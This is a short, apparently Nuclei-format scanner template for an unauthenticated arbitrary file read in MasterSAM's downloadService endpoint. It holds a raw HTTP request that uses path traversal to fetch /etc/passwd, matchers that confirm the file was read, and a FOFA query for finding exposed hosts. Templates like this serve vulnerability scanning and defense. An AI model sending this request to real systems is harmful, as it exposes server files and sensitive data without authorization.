http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 'root:'
            - /bin/bash
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /adama/adama/downloadService?type=1&file=../../../../etc/passwd HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
id: MasterSAM-downloadService-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="MasterSAM"
        MasterSAM downloadService接口存在任意文件读取漏洞，未经身份验证的攻击者可以通过该漏洞读取服务器任意文件，从而获取大量敏感信息。
    name: MasterSAM downloadService 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/y6YagFvR1_ghGKO9KG__zA
    severity: high
    tags:
        - File reading
